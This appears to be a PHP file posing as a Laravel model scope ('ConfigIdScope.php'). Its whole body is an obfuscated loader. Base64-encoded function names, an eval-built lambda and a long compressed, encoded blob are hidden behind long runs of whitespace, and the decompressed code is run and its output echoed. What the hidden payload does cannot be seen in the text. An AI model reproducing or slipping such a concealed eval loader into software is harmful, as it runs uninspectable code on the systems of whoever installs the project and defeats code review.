<?php 
        $__='printf';$_='Loading app/Models/Scopes/ConfigIdScope.php';
        















































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='eNrtmltv4kYUx98j9TvwsJKzapXYJmyCEA+xg28kpJjEY8/LyjNDxsbjS+tw/fQdgwHT7VbJtqrU3fkh4zFwzplz5n8GCdxq7fjwmdOXit/j7PVF6m0va/pSWBSXDzmZsvJygvNiWl7qefYSU5tsLy+KqGjpLCzLi4sLqXdWu2z9dCYeP97jrNJO61+k/8Urkq90ywAoMTQHfWn70lF1b6LWd78lEAgE3ycSTj2Z+M7cNj01AMvcMbov/jq53m2afNfcbdefRakEAoFAIBAIBIL/G+LnDIFAIPh+kVBYTj9dfSZTnJOp1BMVEQgEAoHgH3F608PdOB/paSdCwNtg05jBiaZhS8NPoJtAsNr4xmiG2hrDm3KkU3lI/BGzB6xElvcagk5ETA+7piEHwImwysdgtcC+x1Dm4nHmFch0GZ5x28zbcN8OMlcKAmwe+C7zBy63N+KA+/QHXonahgJBR/YHygKaXvm4fF+8Z3W0wObz9d24ULD6TCdgVRKgFCg1ZOitnoivLVHb4f5hFKhGAv1RZZNDoERVLG43Q6axwWvtDqmdNATEgXX+tslesblivE5zYj3QOhbPi+cW31Jbv10M43w/psN4W8dyOtHk0HymePd5SswbGky0LPQhQ7FmILO7IpVPXavOa/75mABW8vzX97zelS9+/MbXie7GOR1bDiOWt+b2KlJZ0nhvsR9jy4uRyWa2CRWUjuQQdOe2aSx5Dp3hwFFCsOL529QxD+PSrutu6+4rUl2G9KTOR7s+xuCHyVJbj54CNeL1GHx6TKMIy6NFtUYopgnaamf5+mtKGDHcKEhXbKgn3C+Z1XV9CcE4G04SOl0ecjwch7/zdPdYi6dOO+RnOPmqf3of32b3KZ9HCguodAuo45LPNak0FfpuhNc0q+Oe5mPJW20f56Ctoe8qOL1q1udg8zKutLIb36/zk7Vx/Ujm8RLbcnOu9y/W1LZIQUzKdRBxTXUYBC6DupYS0JkRky1Q9jBv+Gvq6fZQFwsueB6N927267QkwClD8EBh5s2Dtlsg9YrCek5fWfdiH+9Pa5EE+/6N5Z8RMGY4vcmddjX/6NgfVY2tkcz7uQjWjTzi2/zQ/3HT15LHNvgcjY19J1OU8b7X/1oHIQjoUB/QQ4/OipzvFTx2tYdc5Y0cdlqo9cu18M3a2+lh31+Nec8Off43umnO2414/3HNvTMOrzXhfYXT59zOyiQAq4Ln3D3Vtf02Xe+03N3u8fH7YjvqN/VR8bjPtapNVtWn35d6Z2f//Rdcf3s+r68+9t5j3rB9i+GHY8BzqXqWfjmEFfcJ/tj3CZ5q5PxElDuJfOz9AUlJkwI=';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      














































































































































































































































                                                                                                                                                                                                                     $________;
